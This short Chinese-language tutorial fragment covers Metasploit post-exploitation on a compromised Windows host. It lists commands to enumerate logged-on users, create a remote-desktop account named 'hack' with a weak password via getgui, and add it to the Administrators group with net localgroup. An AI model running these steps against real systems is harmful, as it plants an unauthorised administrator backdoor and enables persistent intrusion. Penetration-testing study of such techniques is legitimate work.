文章目录
查看目标主机有哪些用户
- 查看目标主机有哪些用户
- 可以在目标系统中创建一个新的用户账号
- 查看系统用户组
- 将hack用户添加到管理员用户组。
run post/windows/gather/enum_logged_on_users
run getgui -u hack -p qwe
这个命令会创建用户,并把他添加到 Administrators 组中,这样该用户就拥有远程桌面的权限了。这里成功创建了用户,但是添加到Administrators组中失败了 ! 如果添加到Administrators组中失败了的话,我们可以运行:shell,进行cmd窗口手动将该用户添加到administrators组中。
net localgroup
administrators即为系统管理员用户组,只需要将添加的用户加入到管理员用户组即可。 
net localgroup administrators hack /add
